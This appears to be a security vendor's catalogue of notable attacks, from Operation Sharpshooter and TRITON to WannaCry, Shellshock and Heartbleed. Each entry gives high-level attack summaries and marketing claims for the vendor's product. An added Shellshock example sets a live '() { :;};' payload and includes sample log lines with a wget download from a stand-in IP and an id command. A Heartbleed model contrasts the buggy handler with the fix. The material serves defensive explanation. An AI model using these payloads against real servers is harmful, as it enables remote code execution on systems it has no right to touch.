SHARP SHOOTER

October 2018

Impact

Lazarus Group-linked campaign (Operation Sharpshooter) that reused the group's malware lineage to plant backdoors in nuclear, defense, energy and financial organizations.

Attack Techniques

  • Spear-phishing emails carry Word documents whose macros download decoy and malicious files from Dropbox
  • Macro shellcode runs the first stage in memory (fileless), inside the Word process
  • Retrieves the second-stage implant, Rising Sun
  • Rising Sun is built from source code of the Lazarus Duuzer backdoor and gives the attacker reconnaissance and remote control

Virsec Protection

  • Stops malware from being written persistently to file system
  • Prevents malware from executing on target

TRITON / TRISIS

January 2018

Impact

Targeted attack on the Triconex safety instrumented system (SIS) of a Middle Eastern petrochemical plant; the safety controllers tripped the plant to shutdown, causing downtime, disruption and significant financial loss.

Attack Techniques

  • Social engineering to gain a foothold, then lateral movement to the SIS engineering workstation
  • File-based malware (Trilog.exe, compiled Python) on the engineering workstation speaks the TriStation protocol to Schneider Electric Triconex safety controllers
  • In-memory implant is injected into the firmware of controllers whose key switch was left in PROGRAM mode
  • Implant lets the attacker read and write controller memory and execute rogue commands on the altered safety controllers

Virsec Protection

  • Stops malware from being written persistently to file system
  • Prevents malware from executing on target system
  • Prevents ICS workstations from attacking downstream controllers

SPECTRE & MELTDOWN

January 2018

Impact

Disclosed hardware vulnerabilities affecting billions of processors shipped over the previous 20 years. Mitigation required OS patches plus microcode and firmware updates, and caused massive disruption, patching problems and performance regressions.

Attack Techniques

  • Exploits flaws in speculative and out-of-order execution to transiently access data the code is not permitted to read
  • Leaks that data through cache-timing side channels (e.g., Flush+Reload), repeated to read memory byte by byte
  • Over 20 variants have since been documented (Spectre v1/v2, Meltdown and their successors)

Virsec Protection

  • Only solution to protect applications from Spectre & Meltdown
  • Detects exploits of speculative execution
  • Terminates side channel attacks

EQUIFAX

September 2017

Impact

Massive breach of personal data on roughly 145 million US consumers (later revised to 147 million). The incident and the poor response led to the departure of the CEO, CIO and CSO, and to legal action by multiple US states.

Attack Techniques

  • Exploited an unpatched Apache Struts 2 vulnerability (CVE-2017-5638, OGNL injection via the Content-Type header) on an internet-facing web application, about two months after the fix was available
  • Gained network access, found plaintext credentials on a file share and used them to reach sensitive databases
  • Exfiltrated data for roughly 76 days without detection; an expired certificate had left encrypted-traffic inspection switched off

Virsec Protection

  • Stops exploitation of web server vulnerabilities including Struts
  • Stops malware from being written persistently to file system
  • Prevents malware from executing on target

NOTPETYA

June 2017

Impact

Massive global disruption and billions in losses for industrial companies including Maersk, FedEx (TNT Express), Merck, Saint-Gobain and others. Although dressed up as ransomware, it was effectively a wiper: the encryption could not be reversed and the goal was to disable systems.

Attack Techniques

  • Delivered through a compromised update of the Ukrainian accounting software M.E.Doc (software supply chain)
  • Memory corruption exploits EternalBlue and EternalRomance (SMBv1) and the DoublePulsar kernel backdoor for further exploitation
  • Also harvests credentials from memory (Mimikatz-style) and spreads with PsExec and WMIC to hosts already patched against the SMB flaws
  • Overwrites the master boot record with its own loader and encrypts the NTFS master file table and files
  • Propagates to reachable Windows hosts over SMB (port 445) within the local network
  • Schedules a reboot so the rogue bootloader runs and locks the machine

Virsec Protection

  • Stops memory corruption toolkits from exploiting processes
  • Detects and stops DLL Injection
  • Stops malware from being written persistently to file system
  • Prevents malware from executing on target

WANNACRY

May 2017

Impact

Massive global ransomware worm that hit an estimated 230,000 computers at some 10,000 organizations in over 150 countries within a day; a kill-switch domain registered by a researcher slowed its spread.

Attack Techniques

  • Exploits an SMBv1 vulnerability in the Windows kernel driver (MS17-010) to spread worm-style without user interaction
  • Memory exploitation toolkits EternalBlue and DoublePulsar
  • DoublePulsar injects a DLL into a running process (lsass.exe) to establish the backdoor
  • Encrypts files on the endpoint and demands a Bitcoin ransom

Virsec Protection

  • Prevents memory vulnerabilities in code from being exploited
  • Detects and stops DLL Injection
  • Stops malware from being written persistently to file system
  • Prevents malware from executing on target systems

ADYLKUZZ

April 2017

Impact

Cryptocurrency-mining botnet that used the same leaked NSA exploits as WannaCry and in fact predated it by weeks; often mislabelled a WannaCry copycat. It mined Monero on infected hosts and, by disabling SMB, inadvertently blocked some WannaCry infections.

Attack Techniques

  • Exploited the same SMBv1 vulnerability in Windows (MS17-010)
  • Memory exploitation toolkits EternalBlue and DoublePulsar
  • Shut down SMB networking on infected hosts to block competing malware, including WannaCry

Virsec Protection

  • Stops memory corruption attacks and buffer overflow exploits
  • Detects and stops DLL Injection
  • Stops malware from being written persistently to file system
  • Prevents malware from executing on target

GLIBC

February 2017

INDUSTROYER

December 2016

Impact

Targeted Ukraine's power grid on 17 December 2016, cutting power to part of Kiev for about an hour. Considered a large-scale test for future ICS attacks.

Attack Techniques

  • Entry via social engineering to gain a foothold
  • Main backdoor (plus a second backdoor disguised as a trojanized Notepad) opens remote access
  • Denial-of-service component exploits a memory corruption flaw in Siemens SIPROTEC relays (CVE-2015-5374) to knock them offline
  • Connects to the attacker's C&C over Tor
  • Payload modules speak industrial protocols directly (IEC 60870-5-101, IEC 60870-5-104, IEC 61850, OPC DA) to switch circuit breakers; a wiper module then erases files and registry keys

Virsec Protection

  • Prevents memory corruption triggered by buffer error vulnerability
  • Stops malware from being written persistently to file system
  • Prevents malware from executing on target

BLACKENERGY

2014

Impact

Russia-attributed Sandworm group's malware family, which began as a DDoS botnet and was later turned against ICS/HMI systems in several countries; its 2015 variant was used in the December 2015 attack on Ukrainian power distributors. The related GreyEnergy family was documented in 2018.

Attack Techniques

  • Entry via spear-phishing email carrying malicious Office documents
  • Fileless attack installs a keylogger that steals credentials
  • Corrupts registry keys
  • DLL injection into running processes and services
  • Connects to attacker-controlled command and control (C&C) servers
  • In the 2015 Ukraine attack, overwrote the firmware of serial-to-Ethernet converters to render them inoperable, and wiped workstations with KillDisk

Virsec Protection

  • Stops malware from being written persistently to file system
  • Prevents malware from executing on target system
  • Stops DLL injections

SHELLSHOCK

2014

Impact

Family of bugs in GNU Bash (CVE-2014-6271 and related CVEs): Bash executed commands appended to function definitions passed in environment variables, letting attackers remotely run arbitrary commands on millions of web servers (via CGI) and on other services that pass untrusted input through the environment.

Attack Techniques

  • Attacker sends crafted input that the target places in Bash's environment (e.g., an HTTP User-Agent or Cookie header handed to a CGI script as HTTP_USER_AGENT), or the victim connects to a malicious server (e.g., rogue DHCP options)
  • Exploits command injection in the Unix Bash shell's handling of exported function definitions: a value of the form "() { :;}; <command>" is imported as a function and the trailing command is executed

Virsec Protection

  • Prevents command (CMD) injection attacks
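
An added example for the Shellshock entry above (this is not Virsec's code and not taken from the original page): it probes the local bash the way a CGI server would expose it, by placing the payload in HTTP_USER_AGENT, and scans constructed web-server log lines for the function-definition prefix. The log lines and IP addresses are made up for illustration.

```python
import os
import re
import subprocess


def shellshock_probe() -> str:
    """Probe the local bash through the CGI vector: the HTTP User-Agent header
    becomes the HTTP_USER_AGENT environment variable of the CGI process.
    Returns 'vulnerable' if bash executes the command trailing the function
    body while importing its environment, 'patched' if it only defines (or
    rejects) the function, 'no-bash' if bash cannot be started here."""
    env = dict(os.environ)
    env["HTTP_USER_AGENT"] = "() { :;}; echo SHELLSHOCK_MARKER"
    try:
        proc = subprocess.run(
            ["bash", "-c", "true"],  # the script does nothing; the environment import is the bug
            env=env, capture_output=True, text=True, timeout=10,
        )
    except (OSError, subprocess.TimeoutExpired):
        return "no-bash"
    return "vulnerable" if "SHELLSHOCK_MARKER" in proc.stdout else "patched"


# Pre-fix bash treated any environment value beginning with "() {" as a
# function definition. Logged headers may be escaped or spaced oddly, so the
# detection pattern is deliberately loose.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Constructed access-log lines (not real traffic). Lines 1 and 3 carry
# payloads in the User-Agent and Referer fields respectively.
SAMPLE_LOG = [
    '203.0.113.10 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \'wget http://198.51.100.7/x -O /tmp/x\'"',
    '198.51.100.22 - - [25/Sep/2014:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [25/Sep/2014:10:02:17 +0000] "GET /cgi-bin/test.sh HTTP/1.1" 500 0 "() { ignored; }; echo Content-Type: text/plain; echo; /usr/bin/id" "curl/7.35.0"',
]


def find_shellshock_hits(log_lines) -> list:
    """Return the indices of log lines carrying a Shellshock-style payload."""
    return [i for i, line in enumerate(log_lines) if SHELLSHOCK_RE.search(line)]


if __name__ == "__main__":
    print("local bash:", shellshock_probe())
    print("suspicious log lines:", find_shellshock_hits(SAMPLE_LOG))
```

On a patched bash the probe prints "patched" (the shell also emits a warning about ignoring the function definition attempt, which the probe suppresses). Patched versions only import functions from variables named BASH_FUNC_name%% and never execute anything after the function body.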

HEARTBLEED

2014

Impact

Missing bounds check in the TLS heartbeat extension of the OpenSSL crypto library (CVE-2014-0160) affected millions of TLS-enabled servers and clients; it forced massive patching and key and certificate rotation, with sporadic exploitation observed.

Attack Techniques

  • Either side of a TLS connection can attack the other: a malicious client sends heartbeats to a vulnerable server, or a victim client connects to a malicious server
  • Implementation bug, not a protocol design error: the handler copies the peer-declared payload length without checking it against the received record, leaking up to 64 KB of process memory (private keys, session cookies, passwords) per heartbeat

Virsec Protection

  • Lexical matching of PII in HTTP responses
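
An added example for the Heartbleed entry above (this is not Virsec's or OpenSSL's code and not taken from the original page): a minimal model of the heartbeat handler with the pre-fix and post-fix logic side by side, run over a constructed byte arena that stands in for the process heap. The record layout follows RFC 6520; the "secret" placed after the record is constructed for illustration.

```python
import struct

HB_REQUEST = 1
HB_RESPONSE = 2
MIN_PADDING = 16  # RFC 6520 requires at least 16 bytes of padding


def build_heartbeat_request(payload: bytes, claimed_len: int) -> bytes:
    """Heartbeat record: type (1) | payload_length (2, big-endian) | payload | padding.
    `claimed_len` is what the peer *says* the payload length is; an attacker lies here."""
    return bytes([HB_REQUEST]) + struct.pack(">H", claimed_len) + payload + b"\x00" * MIN_PADDING


def vulnerable_handler(memory: bytes, record_len: int) -> bytes:
    """Pre-fix logic (OpenSSL 1.0.1 through 1.0.1f): echoes `payload_len` bytes
    from the payload pointer, trusting the peer-supplied length. `record_len`,
    the real size of the received record, is available but never consulted.
    `memory` models the heap: the record sits at offset 0, followed by whatever
    else the process happened to allocate nearby."""
    hbtype = memory[0]
    (payload_len,) = struct.unpack(">H", memory[1:3])
    if hbtype != HB_REQUEST:
        return b""
    # Reads past the record whenever payload_len exceeds the real payload.
    # In C this is a heap over-read of up to 64 KB; Python slicing stops at the end of `memory`.
    pl = memory[3:3 + payload_len]
    return bytes([HB_RESPONSE]) + struct.pack(">H", payload_len) + pl + b"\x00" * MIN_PADDING


def fixed_handler(memory: bytes, record_len: int) -> bytes:
    """Post-fix logic (OpenSSL 1.0.1g): discard the message unless the declared
    payload, plus header and minimum padding, fits inside the received record."""
    hbtype = memory[0]
    (payload_len,) = struct.unpack(">H", memory[1:3])
    if hbtype != HB_REQUEST:
        return b""
    if 1 + 2 + payload_len + MIN_PADDING > record_len:
        return b""  # RFC 6520: silently discard a malformed heartbeat
    pl = memory[3:3 + payload_len]
    return bytes([HB_RESPONSE]) + struct.pack(">H", payload_len) + pl + b"\x00" * MIN_PADDING


def demo() -> dict:
    """Attacker sends a 5-byte payload but claims 64 bytes; a constructed secret
    sits right after the record in the modelled heap."""
    actual = b"hello"
    record = build_heartbeat_request(actual, claimed_len=64)
    secret = b"SECRET-SESSION-COOKIE=abc123"  # constructed neighbour data, not real
    memory = record + secret + b"\x00" * 32
    leaked = vulnerable_handler(memory, len(record))
    safe = fixed_handler(memory, len(record))
    honest = fixed_handler(build_heartbeat_request(actual, len(actual)), len(record))
    return {
        "leaked_secret": secret in leaked,          # pre-fix handler echoes the neighbour
        "fixed_discards_lie": safe == b"",          # post-fix handler drops the lying record
        "fixed_echoes_honest": honest[3:3 + len(actual)] == actual,  # legitimate heartbeat still works
    }


if __name__ == "__main__":
    print(demo())
```

The check in fixed_handler is the whole fix: the declared length is compared against the record actually received before any bytes are copied. Everything the attacker could influence (the type byte, the length field) is validated against something the attacker could not (the length of the record the TLS layer delivered).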

HAVEX

2013

Impact

Russia-attributed APT group (Dragonfly / Energetic Bear) ran an espionage campaign against US and European ICS operators in the energy, aviation, pharmaceutical, defense and petrochemical sectors.

Attack Techniques

  • Entry via spear phishing, watering-hole attacks on compromised websites, and trojanized installers downloaded from ICS/SCADA vendor sites (software supply chain)
  • Installation of the Havex Remote Access Trojan (RAT)
  • RAT hijacks control and reports to remote C&C servers hosted on compromised websites
  • OPC scanning module enumerates ICS/SCADA devices on the network; repeated lateral movement to find weak points toward operational networks

Virsec Protection

  • Prevents XSS attacks in milliseconds
  • Detects and stops execution of fileless scripts

SHAMOON

2012

Impact

Destructive wiper malware (also known as Disttrack), apparently intended for cyber warfare, that spreads from an infected machine to other systems on the network. Used in August 2012 against Saudi Aramco and other Middle Eastern oil and gas companies, wiping more than 30,000 workstations; viewed as the "biggest hack in history" at the time.

Attack Techniques

  • Entry via spear phishing of targeted businesses
  • Fileless component using PowerShell establishes remote C&C
  • Privilege escalation with stolen domain credentials to reach critical systems
  • Wiper component uses a signed RawDisk driver to overwrite files and the master boot record (with an image of a burning US flag), leaving machines unbootable

Virsec Protection

  • Stops fileless malware attacks
  • Prevents memory corruption through buffer error vulnerability and subsequent privilege escalation
  • Stops malware from being written persistently to file system
  • Prevents malware from executing on target system